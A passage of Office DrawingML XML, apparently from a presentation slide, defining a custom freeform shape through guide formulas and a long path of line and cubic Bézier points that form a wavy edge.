              <a:gd name="connsiteX98" fmla="*/ 1913794 w 12192000"/>
              <a:gd name="connsiteY98" fmla="*/ 365255 h 4939827"/>
              <a:gd name="connsiteX99" fmla="*/ 2129762 w 12192000"/>
              <a:gd name="connsiteY99" fmla="*/ 367832 h 4939827"/>
              <a:gd name="connsiteX100" fmla="*/ 2376970 w 12192000"/>
              <a:gd name="connsiteY100" fmla="*/ 350129 h 4939827"/>
              <a:gd name="connsiteX101" fmla="*/ 2480155 w 12192000"/>
              <a:gd name="connsiteY101" fmla="*/ 359227 h 4939827"/>
              <a:gd name="connsiteX102" fmla="*/ 2586782 w 12192000"/>
              <a:gd name="connsiteY102" fmla="*/ 339352 h 4939827"/>
              <a:gd name="connsiteX103" fmla="*/ 2679617 w 12192000"/>
              <a:gd name="connsiteY103" fmla="*/ 305383 h 4939827"/>
              <a:gd name="connsiteX104" fmla="*/ 2788947 w 12192000"/>
              <a:gd name="connsiteY104" fmla="*/ 250375 h 4939827"/>
              <a:gd name="connsiteX105" fmla="*/ 2965530 w 12192000"/>
              <a:gd name="connsiteY105" fmla="*/ 245958 h 4939827"/>
              <a:gd name="connsiteX106" fmla="*/ 3103677 w 12192000"/>
              <a:gd name="connsiteY106" fmla="*/ 209527 h 4939827"/>
              <a:gd name="connsiteX107" fmla="*/ 3126759 w 12192000"/>
              <a:gd name="connsiteY107" fmla="*/ 211226 h 4939827"/>
              <a:gd name="connsiteX108" fmla="*/ 3164020 w 12192000"/>
              <a:gd name="connsiteY108" fmla="*/ 212779 h 4939827"/>
              <a:gd name="connsiteX109" fmla="*/ 3285019 w 12192000"/>
              <a:gd name="connsiteY109" fmla="*/ 220535 h 4939827"/>
              <a:gd name="connsiteX110" fmla="*/ 3365154 w 12192000"/>
              <a:gd name="connsiteY110" fmla="*/ 226416 h 4939827"/>
              <a:gd name="connsiteX111" fmla="*/ 3367507 w 12192000"/>
              <a:gd name="connsiteY111" fmla="*/ 225416 h 4939827"/>
              <a:gd name="connsiteX112" fmla="*/ 3387567 w 12192000"/>
              <a:gd name="connsiteY112" fmla="*/ 227103 h 4939827"/>
              <a:gd name="connsiteX113" fmla="*/ 3498001 w 12192000"/>
              <a:gd name="connsiteY113" fmla="*/ 231941 h 4939827"/>
              <a:gd name="connsiteX114" fmla="*/ 3561557 w 12192000"/>
              <a:gd name="connsiteY114" fmla="*/ 228095 h 4939827"/>
              <a:gd name="connsiteX115" fmla="*/ 3611920 w 12192000"/>
              <a:gd name="connsiteY115" fmla="*/ 218094 h 4939827"/>
              <a:gd name="connsiteX116" fmla="*/ 3620528 w 12192000"/>
              <a:gd name="connsiteY116" fmla="*/ 218788 h 4939827"/>
              <a:gd name="connsiteX117" fmla="*/ 3620766 w 12192000"/>
              <a:gd name="connsiteY117" fmla="*/ 218511 h 4939827"/>
              <a:gd name="connsiteX118" fmla="*/ 3629977 w 12192000"/>
              <a:gd name="connsiteY118" fmla="*/ 218664 h 4939827"/>
              <a:gd name="connsiteX119" fmla="*/ 3636217 w 12192000"/>
              <a:gd name="connsiteY119" fmla="*/ 220048 h 4939827"/>
              <a:gd name="connsiteX120" fmla="*/ 3709484 w 12192000"/>
              <a:gd name="connsiteY120" fmla="*/ 186927 h 4939827"/>
              <a:gd name="connsiteX121" fmla="*/ 3761342 w 12192000"/>
              <a:gd name="connsiteY121" fmla="*/ 177474 h 4939827"/>
              <a:gd name="connsiteX122" fmla="*/ 3799748 w 12192000"/>
              <a:gd name="connsiteY122" fmla="*/ 167154 h 4939827"/>
              <a:gd name="connsiteX123" fmla="*/ 3922756 w 12192000"/>
              <a:gd name="connsiteY123" fmla="*/ 194044 h 4939827"/>
              <a:gd name="connsiteX124" fmla="*/ 4028476 w 12192000"/>
              <a:gd name="connsiteY124" fmla="*/ 223679 h 4939827"/>
              <a:gd name="connsiteX125" fmla="*/ 4191582 w 12192000"/>
              <a:gd name="connsiteY125" fmla="*/ 238952 h 4939827"/>
              <a:gd name="connsiteX126" fmla="*/ 4251024 w 12192000"/>
              <a:gd name="connsiteY126" fmla="*/ 240874 h 4939827"/>
              <a:gd name="connsiteX127" fmla="*/ 4355275 w 12192000"/>
              <a:gd name="connsiteY127" fmla="*/ 260205 h 4939827"/>
              <a:gd name="connsiteX128" fmla="*/ 4423807 w 12192000"/>
              <a:gd name="connsiteY128" fmla="*/ 270366 h 4939827"/>
              <a:gd name="connsiteX129" fmla="*/ 4558432 w 12192000"/>
              <a:gd name="connsiteY129" fmla="*/ 269194 h 4939827"/>
              <a:gd name="connsiteX130" fmla="*/ 4635061 w 12192000"/>
              <a:gd name="connsiteY130" fmla="*/ 280682 h 4939827"/>
              <a:gd name="connsiteX131" fmla="*/ 4807427 w 12192000"/>
              <a:gd name="connsiteY131" fmla="*/ 276835 h 4939827"/>
              <a:gd name="connsiteX132" fmla="*/ 5028933 w 12192000"/>
              <a:gd name="connsiteY132" fmla="*/ 183887 h 4939827"/>
              <a:gd name="connsiteX133" fmla="*/ 5093642 w 12192000"/>
              <a:gd name="connsiteY133" fmla="*/ 177214 h 4939827"/>
              <a:gd name="connsiteX134" fmla="*/ 5102642 w 12192000"/>
              <a:gd name="connsiteY134" fmla="*/ 186816 h 4939827"/>
              <a:gd name="connsiteX135" fmla="*/ 5193590 w 12192000"/>
              <a:gd name="connsiteY135" fmla="*/ 156458 h 4939827"/>
              <a:gd name="connsiteX136" fmla="*/ 5323922 w 12192000"/>
              <a:gd name="connsiteY136" fmla="*/ 146332 h 4939827"/>
              <a:gd name="connsiteX137" fmla="*/ 5421860 w 12192000"/>
              <a:gd name="connsiteY137" fmla="*/ 167298 h 4939827"/>
              <a:gd name="connsiteX138" fmla="*/ 5476948 w 12192000"/>
              <a:gd name="connsiteY138" fmla="*/ 173249 h 4939827"/>
              <a:gd name="connsiteX139" fmla="*/ 5516842 w 12192000"/>
              <a:gd name="connsiteY139" fmla="*/ 184018 h 4939827"/>
              <a:gd name="connsiteX140" fmla="*/ 5619415 w 12192000"/>
              <a:gd name="connsiteY140" fmla="*/ 176781 h 4939827"/>
              <a:gd name="connsiteX141" fmla="*/ 5789867 w 12192000"/>
              <a:gd name="connsiteY141" fmla="*/ 150304 h 4939827"/>
              <a:gd name="connsiteX142" fmla="*/ 5825953 w 12192000"/>
              <a:gd name="connsiteY142" fmla="*/ 147907 h 4939827"/>
              <a:gd name="connsiteX143" fmla="*/ 5856168 w 12192000"/>
              <a:gd name="connsiteY143" fmla="*/ 158719 h 4939827"/>
              <a:gd name="connsiteX144" fmla="*/ 5862476 w 12192000"/>
              <a:gd name="connsiteY144" fmla="*/ 172447 h 4939827"/>
              <a:gd name="connsiteX145" fmla="*/ 5882195 w 12192000"/>
              <a:gd name="connsiteY145" fmla="*/ 173195 h 4939827"/>
              <a:gd name="connsiteX146" fmla="*/ 5952585 w 12192000"/>
              <a:gd name="connsiteY146" fmla="*/ 161012 h 4939827"/>
              <a:gd name="connsiteX147" fmla="*/ 6001964 w 12192000"/>
              <a:gd name="connsiteY147" fmla="*/ 154786 h 4939827"/>
              <a:gd name="connsiteX148" fmla="*/ 6184207 w 12192000"/>
              <a:gd name="connsiteY148" fmla="*/ 132658 h 4939827"/>
              <a:gd name="connsiteX149" fmla="*/ 6415830 w 12192000"/>
              <a:gd name="connsiteY149" fmla="*/ 136006 h 4939827"/>
              <a:gd name="connsiteX150" fmla="*/ 6756965 w 12192000"/>
              <a:gd name="connsiteY150" fmla="*/ 57636 h 4939827"/>
              <a:gd name="connsiteX151" fmla="*/ 6819400 w 12192000"/>
              <a:gd name="connsiteY151" fmla="*/ 30742 h 4939827"/>
              <a:gd name="connsiteX152" fmla="*/ 6986370 w 12192000"/>
              <a:gd name="connsiteY152" fmla="*/ 12659 h 4939827"/>
              <a:gd name="connsiteX153" fmla="*/ 6989536 w 12192000"/>
              <a:gd name="connsiteY153" fmla="*/ 14528 h 4939827"/>
              <a:gd name="connsiteX154" fmla="*/ 7015933 w 12192000"/>
              <a:gd name="connsiteY154" fmla="*/ 9653 h 4939827"/>
              <a:gd name="connsiteX155" fmla="*/ 7020592 w 12192000"/>
              <a:gd name="connsiteY155" fmla="*/ 1651 h 4939827"/>
              <a:gd name="connsiteX156" fmla="*/ 7025905 w 12192000"/>
              <a:gd name="connsiteY156" fmla="*/ 0 h 493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Lst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12192000" h="4939827">
                <a:moveTo>
                  <a:pt x="7025905" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7032579" y="2808"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7044119" y="6590"/>
                  <a:pt x="7059062" y="10207"/>
                  <a:pt x="7079505" y="12971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7111522" y="10537"/>
                  <a:pt x="7122591" y="11519"/>
                  <a:pt x="7158791" y="12462"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7233338" y="24846"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7247177" y="23787"/>
                  <a:pt x="7254856" y="25962"/>
                  <a:pt x="7259791" y="29557"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7263923" y="35029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7281549" y="39654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7374735" y="65326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7376078" y="63849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7402026" y="60308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7415091" y="77403"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7421672" y="79965"/>
                  <a:pt x="7475806" y="92960"/>
                  <a:pt x="7488682" y="83440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7541625" y="94782"/>
                  <a:pt x="7683214" y="133614"/>
                  <a:pt x="7732750" y="145456"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7748318" y="162765"/>
                  <a:pt x="7764581" y="171696"/>
                  <a:pt x="7785900" y="154493"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7822539" y="158614"/>
                  <a:pt x="7915312" y="166523"/>
                  <a:pt x="7952584" y="170181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7998047" y="181004"/>
                  <a:pt x="8029749" y="207794"/>
                  <a:pt x="8058681" y="219431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8095466" y="185885"/>
                  <a:pt x="8090835" y="241759"/>
                  <a:pt x="8126175" y="240005"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8163290" y="246246"/>
                  <a:pt x="8238799" y="256773"/>
                  <a:pt x="8281371" y="256875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8313651" y="251026"/>
                  <a:pt x="8346882" y="248570"/>
                  <a:pt x="8381609" y="240618"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8406759" y="232517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8426506" y="241842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8427949" y="240981"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8431925" y="239458"/>
                  <a:pt x="8436260" y="239096"/>
                  <a:pt x="8441468" y="241157"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8565757" y="255317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8573171" y="258426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8573548" y="258241"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8575650" y="258391"/>
                  <a:pt x="8618469" y="259217"/>
                  <a:pt x="8622021" y="261028"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8672650" y="254821"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8716151" y="260353"/>
                  <a:pt x="8748971" y="243487"/>
                  <a:pt x="8785543" y="263406"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8826293" y="268498"/>
                  <a:pt x="8797654" y="254573"/>
                  <a:pt x="8830588" y="265483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8849202" y="267272"/>
                  <a:pt x="8877544" y="266277"/>
                  <a:pt x="8905142" y="264958"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8968582" y="262728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8972994" y="263284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9004605" y="258041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9016165" y="261258"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9028775" y="267579"/>
                  <a:pt x="9039083" y="277488"/>
                  <a:pt x="9043297" y="281547"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9048315" y="279264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9054706" y="278538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9070919" y="281810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9076813" y="283909"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9080948" y="285030"/>
                  <a:pt x="9083794" y="285362"/>
                  <a:pt x="9085871" y="285133"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9086159" y="284887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9134606" y="288168"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9149441" y="274272"/>
                  <a:pt x="9194106" y="309414"/>
                  <a:pt x="9195590" y="279568"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9212898" y="284479"/>
                  <a:pt x="9220866" y="298055"/>
                  <a:pt x="9219336" y="278133"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9225159" y="279201"/>
                  <a:pt x="9229164" y="278078"/>
                  <a:pt x="9232362" y="275894"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9283638" y="299924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9371484" y="329634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9404829" y="339038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9427021" y="358784"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9500124" y="364086"/>
                  <a:pt x="9604652" y="390635"/>
                  <a:pt x="9670844" y="405128"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9688531" y="417998"/>
                  <a:pt x="9762277" y="426463"/>
                  <a:pt x="9816083" y="416573"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9936741" y="437044"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9978091" y="447025"/>
                  <a:pt x="10008641" y="443705"/>
                  <a:pt x="10050093" y="443783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10074709" y="448779"/>
                  <a:pt x="10088915" y="449258"/>
                  <a:pt x="10130090" y="459520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10137791" y="458564"/>
                  <a:pt x="10165777" y="459877"/>
                  <a:pt x="10173456" y="457749"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10218232" y="459820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10354176" y="471377"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10367946" y="478917"/>
                  <a:pt x="10417270" y="488110"/>
                  <a:pt x="10430681" y="481226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10441804" y="481366"/>
                  <a:pt x="10469025" y="490181"/>
                  <a:pt x="10478169" y="481774"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10503830" y="488972"/>
                  <a:pt x="10531359" y="489751"/>
                  <a:pt x="10540907" y="485607"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10569054" y="475472"/>
                  <a:pt x="10590882" y="489185"/>
                  <a:pt x="10614941" y="487592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10654657" y="492458"/>
                  <a:pt x="10645652" y="516778"/>
                  <a:pt x="10674098" y="521656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10737163" y="537583"/>
                  <a:pt x="10829686" y="559302"/>
                  <a:pt x="10874834" y="574867"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10919981" y="590432"/>
                  <a:pt x="10878682" y="577481"/>
                  <a:pt x="10944981" y="615042"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10976235" y="616974"/>
                  <a:pt x="10982969" y="648568"/>
                  <a:pt x="11006376" y="645957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11005343" y="630631"/>
                  <a:pt x="11047577" y="676048"/>
                  <a:pt x="11076308" y="675698"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11093142" y="677175"/>
                  <a:pt x="11131116" y="681348"/>
                  <a:pt x="11148789" y="685041"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11177310" y="688243"/>
                  <a:pt x="11217768" y="714725"/>
                  <a:pt x="11249129" y="684218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11276269" y="697037"/>
                  <a:pt x="11257432" y="693670"/>
                  <a:pt x="11299915" y="692177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11314401" y="703224"/>
                  <a:pt x="11371412" y="714421"/>
                  <a:pt x="11386973" y="708209"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11425657" y="716286"/>
                  <a:pt x="11454555" y="715485"/>
                  <a:pt x="11500105" y="735014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11545172" y="751781"/>
                  <a:pt x="11573053" y="787789"/>
                  <a:pt x="11621735" y="789584"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11691200" y="867902"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11734106" y="911360"/>
                  <a:pt x="11773008" y="895495"/>
                  <a:pt x="11819427" y="911634"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11969720" y="964737"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12009110" y="978008"/>
                  <a:pt x="12010206" y="989588"/>
                  <a:pt x="12055766" y="991268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12105723" y="1003445"/>
                  <a:pt x="12068493" y="1020292"/>
                  <a:pt x="12171539" y="995427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12174929" y="995822"/>
                  <a:pt x="12180763" y="996228"/>
                  <a:pt x="12187831" y="996580"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12192000" y="996726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12192000" y="4939827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4939827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="512043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381" y="512580"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="39359" y="514524"/>
                  <a:pt x="72732" y="514144"/>
                  <a:pt x="100029" y="504758"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115935" y="525779"/>
                  <a:pt x="143126" y="489229"/>
                  <a:pt x="155244" y="525130"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173881" y="522487"/>
                  <a:pt x="242791" y="514086"/>
                  <a:pt x="254366" y="534449"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="303041" y="537382"/>
                  <a:pt x="380161" y="541650"/>
                  <a:pt x="447292" y="542725"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="530282" y="553078"/>
                  <a:pt x="572130" y="539673"/>
                  <a:pt x="628105" y="547853"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="661608" y="509671"/>
                  <a:pt x="746152" y="605137"/>
                  <a:pt x="783146" y="591799"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="862499" y="590113"/>
                  <a:pt x="949481" y="579142"/>
                  <a:pt x="1043676" y="591887"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1120353" y="576991"/>
                  <a:pt x="1172004" y="553592"/>
                  <a:pt x="1281816" y="520946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1339915" y="511282"/>
                  <a:pt x="1459480" y="554579"/>
                  <a:pt x="1486347" y="487310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1507765" y="532008"/>
                  <a:pt x="1539168" y="465954"/>
                  <a:pt x="1568079" y="462531"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1587821" y="491525"/>
                  <a:pt x="1601468" y="469316"/>
                  <a:pt x="1622516" y="466058"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1630056" y="483510"/>
                  <a:pt x="1647504" y="484261"/>
                  <a:pt x="1655457" y="465359"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1651800" y="419723"/>
                  <a:pt x="1709718" y="447719"/>
                  <a:pt x="1717454" y="417203"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1753115" y="414011"/>
                  <a:pt x="1882851" y="412376"/>
                  <a:pt x="1913794" y="365255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2001060" y="361067"/>
                  <a:pt x="2099559" y="366414"/>
                  <a:pt x="2129762" y="367832"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2215380" y="355065"/>
                  <a:pt x="2248807" y="343296"/>
                  <a:pt x="2376970" y="350129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2393251" y="360463"/>
                  <a:pt x="2473371" y="379419"/>
                  <a:pt x="2480155" y="359227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2520060" y="359505"/>
                  <a:pt x="2561270" y="311415"/>
                  <a:pt x="2586782" y="339352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2585230" y="294982"/>
                  <a:pt x="2653633" y="316689"/>
                  <a:pt x="2679617" y="305383"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2721434" y="266011"/>
                  <a:pt x="2746765" y="276002"/>
                  <a:pt x="2788947" y="250375"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2851672" y="235447"/>
                  <a:pt x="2913075" y="252766"/>
                  <a:pt x="2965530" y="245958"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3001911" y="238336"/>
                  <a:pt x="3090203" y="217828"/>
                  <a:pt x="3103677" y="209527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3126759" y="211226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3136908" y="211889"/>
                  <a:pt x="3148903" y="212490"/>
                  <a:pt x="3164020" y="212779"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3225474" y="210084"/>
                  <a:pt x="3231859" y="218227"/>
                  <a:pt x="3285019" y="220535"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3318541" y="222809"/>
                  <a:pt x="3359787" y="223898"/>
                  <a:pt x="3365154" y="226416"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3367507" y="225416"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3377583" y="223667"/>
                  <a:pt x="3383502" y="224760"/>
                  <a:pt x="3387567" y="227103"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3498001" y="231941"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3513569" y="226158"/>
                  <a:pt x="3539132" y="232525"/>
                  <a:pt x="3561557" y="228095"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3574944" y="230843"/>
                  <a:pt x="3597426" y="216287"/>
                  <a:pt x="3611920" y="218094"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3620528" y="218788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3620766" y="218511"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3622780" y="218042"/>
                  <a:pt x="3625663" y="218038"/>
                  <a:pt x="3629977" y="218664"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3636217" y="220048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3709484" y="186927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3731015" y="183190"/>
                  <a:pt x="3745790" y="180810"/>
                  <a:pt x="3761342" y="177474"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3799748" y="167154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3922756" y="194044"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3960877" y="203465"/>
                  <a:pt x="3965250" y="215357"/>
                  <a:pt x="4028476" y="223679"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4088751" y="228019"/>
                  <a:pt x="4139112" y="248870"/>
                  <a:pt x="4191582" y="238952"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4210842" y="254091"/>
                  <a:pt x="4229809" y="260810"/>
                  <a:pt x="4251024" y="240874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4306627" y="250935"/>
                  <a:pt x="4317066" y="281625"/>
                  <a:pt x="4355275" y="260205"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4390577" y="327090"/>
                  <a:pt x="4385658" y="272111"/>
                  <a:pt x="4423807" y="270366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4457666" y="271864"/>
                  <a:pt x="4523223" y="267475"/>
                  <a:pt x="4558432" y="269194"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4594553" y="230955"/>
                  <a:pt x="4596517" y="287120"/>
                  <a:pt x="4635061" y="280682"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4676560" y="281955"/>
                  <a:pt x="4741782" y="292968"/>
                  <a:pt x="4807427" y="276835"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4876769" y="256626"/>
                  <a:pt x="4951997" y="249407"/>
                  <a:pt x="5028933" y="183887"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5044713" y="164149"/>
                  <a:pt x="5073685" y="161161"/>
                  <a:pt x="5093642" y="177214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5097077" y="179978"/>
                  <a:pt x="5100108" y="183212"/>
                  <a:pt x="5102642" y="186816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5150234" y="139156"/>
                  <a:pt x="5169674" y="190314"/>
                  <a:pt x="5193590" y="156458"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5257854" y="151722"/>
                  <a:pt x="5301917" y="175841"/>
                  <a:pt x="5323922" y="146332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5355266" y="153538"/>
                  <a:pt x="5392601" y="198271"/>
                  <a:pt x="5421860" y="167298"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5420630" y="196364"/>
                  <a:pt x="5461576" y="151467"/>
                  <a:pt x="5476948" y="173249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5487334" y="191763"/>
                  <a:pt x="5502178" y="182456"/>
                  <a:pt x="5516842" y="184018"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5533140" y="200158"/>
                  <a:pt x="5599828" y="189750"/>
                  <a:pt x="5619415" y="176781"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5690073" y="168499"/>
                  <a:pt x="5748631" y="186964"/>
                  <a:pt x="5789867" y="150304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5802836" y="146282"/>
                  <a:pt x="5814753" y="145947"/>
                  <a:pt x="5825953" y="147907"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5856168" y="158719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5862476" y="172447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5882195" y="173195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5952585" y="161012"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5962273" y="166588"/>
                  <a:pt x="5992020" y="151579"/>
                  <a:pt x="6001964" y="154786"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6061748" y="122178"/>
                  <a:pt x="6101539" y="131534"/>
                  <a:pt x="6184207" y="132658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6266582" y="127016"/>
                  <a:pt x="6286876" y="151859"/>
